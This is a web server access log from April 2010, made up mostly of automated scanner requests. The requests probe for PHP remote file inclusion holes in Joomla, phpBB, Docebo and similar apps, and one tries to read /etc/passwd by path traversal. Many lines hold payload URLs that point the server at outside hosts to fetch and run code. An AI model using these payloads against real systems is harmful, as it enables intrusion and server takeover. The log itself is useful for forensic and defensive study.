207.46.204.192 - - [16/Apr/2010:13:11:37 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
78.110.50.121 - - [16/Apr/2010:13:11:56 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://tawatec.su/xmlrpc/test.txt?? HTTP/1.1" 404 340 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
78.110.50.121 - - [16/Apr/2010:13:11:56 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://tawatec.su/xmlrpc/test.txt?? HTTP/1.1" 404 335 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
207.46.204.192 - - [16/Apr/2010:13:12:19 -0500] "GET /logs/access_log.1219708800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.88 - - [16/Apr/2010:13:13:18 -0500] "GET /logs/access_log.1245628800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.222.152.66 - - [16/Apr/2010:13:15:01 -0500] "GET /logs//main.htm//lib/connect.lib.php?g4[path]=http://ezt.cz/css/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:13:15:01 -0500] "GET /logs/access_log.1270684800%20%20//main.htm//lib/connect.lib.php?g4[path]=http://ezt.cz/css/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:13:15:01 -0500] "GET //main.htm//lib/connect.lib.php?g4[path]=http://ezt.cz/css/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:13:15:01 -0500] "GET /logs//main.htm//lib/connect.lib.php?g4[path]=http://ezt.cz/css/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:13:15:01 -0500] "GET //main.htm//lib/connect.lib.php?g4[path]=http://ezt.cz/css/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:13:15:01 -0500] "GET /logs/access_log.1270684800%20%20//main.htm//lib/connect.lib.php?g4[path]=http://ezt.cz/css/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:13:15:12 -0500] "GET //main.htm//lib/connect.lib.php?g4[path]=http://ezt.cz/css/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:13:15:12 -0500] "GET /logs/access_log.1270684800%20%20//main.htm//lib/connect.lib.php?g4[path]=http://ezt.cz/css/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:13:15:12 -0500] "GET /logs//main.htm//lib/connect.lib.php?g4[path]=http://ezt.cz/css/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
207.46.13.99 - - [16/Apr/2010:13:16:19 -0500] "GET /logs/access_log.1186617600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.73.147.76 - - [16/Apr/2010:13:17:35 -0500] "GET /logs/access_log.1219363200//news.php?DOCUMENT_ROOT=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
69.73.147.76 - - [16/Apr/2010:13:17:35 -0500] "GET //news.php?DOCUMENT_ROOT=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
69.73.147.76 - - [16/Apr/2010:13:17:35 -0500] "GET /logs//news.php?DOCUMENT_ROOT=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
207.46.13.145 - - [16/Apr/2010:13:17:47 -0500] "GET /logs/access_log.1259539200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
221.139.0.75 - - [16/Apr/2010:13:18:41 -0500] "GET /logs/access_log.1220054400//Gallery/displayCategory.php?basepath=http://www.hackclub.com.ar/javascript//id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
221.139.0.75 - - [16/Apr/2010:13:18:41 -0500] "GET //Gallery/displayCategory.php?basepath=http://www.hackclub.com.ar/javascript//id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
221.139.0.75 - - [16/Apr/2010:13:18:41 -0500] "GET /logs//Gallery/displayCategory.php?basepath=http://www.hackclub.com.ar/javascript//id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
72.55.146.200 - - [16/Apr/2010:13:20:04 -0500] "GET /logs//images/errors.php?error=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
72.55.146.200 - - [16/Apr/2010:13:20:04 -0500] "GET //images/errors.php?error=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
217.70.32.2 - - [16/Apr/2010:13:21:11 -0500] "GET /agenda.php3?rootagenda=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
217.70.32.2 - - [16/Apr/2010:13:21:11 -0500] "GET /logs/agenda.php3?rootagenda=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
217.70.32.2 - - [16/Apr/2010:13:21:12 -0500] "GET /logs/access_log.1262822400/agenda.php3?rootagenda=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:21:32 -0500] "GET /logs/access_log.1219363200%20%20//docebo//doceboCms/class/class.dashboard_cms.php?where_framework=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:21:32 -0500] "GET /logs//docebo//doceboCms/class/class.dashboard_cms.php?where_framework=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:21:33 -0500] "GET //docebo//doceboCms/class/class.dashboard_cms.php?where_framework=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:21:35 -0500] "GET /logs/access_log.1267920000%20%20//docebo//doceboCms/class/class.dashboard_cms.php?where_framework=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:21:46 -0500] "GET //delete_all.php?board.skin.path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:21:46 -0500] "GET /logs//delete_all.php?board.skin.path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:21:46 -0500] "GET /logs/access_log.1270684800%20%20//delete_all.php?board.skin.path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
84.38.160.77 - - [16/Apr/2010:13:22:43 -0500] "GET /logs//images/errors.php?error=http://www.clydeford.com/website/administrator/components/id.txt??%0D?? HTTP/1.1" 404 307 "-""libwww-perl/5.76"
84.38.160.77 - - [16/Apr/2010:13:22:43 -0500] "GET //images/errors.php?error=http://www.clydeford.com/website/administrator/components/id.txt??%0D?? HTTP/1.1" 404 302 "-""libwww-perl/5.76"
124.49.100.254 - - [16/Apr/2010:13:23:54 -0500] "GET //delete_all.php?board.skin.path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:23:54 -0500] "GET /logs/access_log.1270684800%20%20//delete_all.php?board.skin.path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:23:54 -0500] "GET /logs//delete_all.php?board.skin.path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:24:11 -0500] "GET /logs/access_log.1270684800%20%20//delete_all.php?board.skin.path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:24:13 -0500] "GET //delete_all.php?board.skin.path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:24:13 -0500] "GET /logs//delete_all.php?board.skin.path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:25:19 -0500] "GET //delete_all.php?board.skin.path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:25:20 -0500] "GET /logs//delete_all.php?board.skin.path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:25:20 -0500] "GET /logs/access_log.1270684800%20%20//delete_all.php?board.skin.path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
207.46.13.98 - - [16/Apr/2010:13:27:17 -0500] "GET /logs/access_log.1235606400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
205.211.141.243 - - [16/Apr/2010:13:30:08 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
205.211.141.243 - - [16/Apr/2010:13:30:08 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
205.211.141.243 - - [16/Apr/2010:13:30:11 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
124.49.100.254 - - [16/Apr/2010:13:32:24 -0500] "GET /logs//~alumnide//modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:32:24 -0500] "GET /logs/access_log.1228089600//~alumnide//modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:32:24 -0500] "GET //~alumnide//modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:32:48 -0500] "GET //~alumnide//modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:32:49 -0500] "GET /logs//~alumnide//modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:32:49 -0500] "GET /logs/access_log.1228089600//~alumnide//modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:32:52 -0500] "GET /logs//~alumnide//modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:32:52 -0500] "GET /logs/access_log.1228089600//~alumnide//modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:32:52 -0500] "GET //~alumnide//modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:32:54 -0500] "GET /logs//~alumnide//modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:32:54 -0500] "GET //~alumnide//modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:32:57 -0500] "GET /logs/access_log.1228089600//~alumnide//modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:33:01 -0500] "GET /logs//~alumnide//modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:33:01 -0500] "GET /logs/access_log.1228089600//~alumnide//modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:33:02 -0500] "GET //~alumnide//modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:33:29 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:33:29 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:33:29 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:33:29 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:33:30 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:33:30 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:13:33:31 -0500] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:13:33:31 -0500] "GET /logs/access_log.1268956800//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:13:33:31 -0500] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:33:38 -0500] "GET /logs/access_log.1268265600%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:33:39 -0500] "GET /logs/access_log.1268265600%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:33:47 -0500] "GET /logs/access_log.1268265600%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:33:55 -0500] "GET /logs/access_log.1212105600%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:33:57 -0500] "GET /logs/access_log.1212105600%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:33:58 -0500] "GET /logs/access_log.1212105600%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:33:59 -0500] "GET /logs//~alumnide//modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:33:59 -0500] "GET /logs/access_log.1228089600//~alumnide//modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:33:59 -0500] "GET //~alumnide//modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:13:34:09 -0500] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:13:34:09 -0500] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:13:34:09 -0500] "GET /logs/access_log.1268956800//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:13:34:18 -0500] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:13:34:18 -0500] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:13:34:18 -0500] "GET /logs/access_log.1268956800%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 367 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:13:34:19 -0500] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:13:34:19 -0500] "GET /logs/access_log.1268956800%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 367 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:13:34:19 -0500] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:34:22 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:34:22 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:34:22 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:34:22 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:34:22 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:34:22 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:34:32 -0500] "GET /logs/access_log.1268265600%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:34:34 -0500] "GET /logs/access_log.1268265600%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:34:34 -0500] "GET /logs/access_log.1268265600%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:34:43 -0500] "GET /logs/access_log.1212105600%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:34:45 -0500] "GET /logs/access_log.1212105600%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:34:46 -0500] "GET /logs/access_log.1212105600%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
217.70.32.2 - - [16/Apr/2010:13:35:00 -0500] "GET //agenda2.php3?rootagenda=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
217.70.32.2 - - [16/Apr/2010:13:35:00 -0500] "GET /logs//agenda2.php3?rootagenda=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
217.70.32.2 - - [16/Apr/2010:13:35:00 -0500] "GET /logs/access_log.1262822400//agenda2.php3?rootagenda=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:13:35:27 -0500] "GET //tmsp/add_tmsp.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:13:35:27 -0500] "GET /logs//tmsp/add_tmsp.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:13:35:27 -0500] "GET /logs/access_log.1263859200//tmsp/add_tmsp.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
217.70.32.2 - - [16/Apr/2010:13:35:40 -0500] "GET //agenda2.php3?rootagenda=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
217.70.32.2 - - [16/Apr/2010:13:35:40 -0500] "GET /logs//agenda2.php3?rootagenda=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
217.70.32.2 - - [16/Apr/2010:13:35:40 -0500] "GET /logs/access_log.1262822400//agenda2.php3?rootagenda=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:13:36:08 -0500] "GET //tmsp/add_tmsp.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:13:36:08 -0500] "GET /logs//tmsp/add_tmsp.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:13:36:08 -0500] "GET /logs/access_log.1263859200//tmsp/add_tmsp.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:13:37:34 -0500] "GET /logs/access_log.1268611200//tmsp/add_tmsp.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:38:05 -0500] "GET //docebo//doceboCms/class/class.dashboard_cms.php?where_framework=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:38:05 -0500] "GET /logs/access_log.1219363200%20%20//docebo//doceboCms/class/class.dashboard_cms.php?where_framework=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:38:05 -0500] "GET /logs//docebo//doceboCms/class/class.dashboard_cms.php?where_framework=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:38:06 -0500] "GET /logs/access_log.1267920000%20%20//docebo//doceboCms/class/class.dashboard_cms.php?where_framework=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:38:19 -0500] "GET /logs/access_log.1219363200%20%20//docebo//doceboCms/class/class.dashboard_cms.php?where_framework=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:38:19 -0500] "GET /logs//docebo//doceboCms/class/class.dashboard_cms.php?where_framework=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:38:19 -0500] "GET //docebo//doceboCms/class/class.dashboard_cms.php?where_framework=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:38:20 -0500] "GET /logs/access_log.1267920000%20%20//docebo//doceboCms/class/class.dashboard_cms.php?where_framework=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
217.70.32.2 - - [16/Apr/2010:13:39:34 -0500] "GET /logs/access_log.1262822400/sources/lostpw.php?CONFIG[path]=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
217.70.32.2 - - [16/Apr/2010:13:39:34 -0500] "GET /sources/lostpw.php?CONFIG[path]=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
217.70.32.2 - - [16/Apr/2010:13:39:34 -0500] "GET /logs/sources/lostpw.php?CONFIG[path]=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:39:44 -0500] "GET /logs//docebo//doceboCms/class/class.dashboard_cms.php?where_framework=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:39:44 -0500] "GET /logs/access_log.1219363200%20%20//docebo//doceboCms/class/class.dashboard_cms.php?where_framework=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
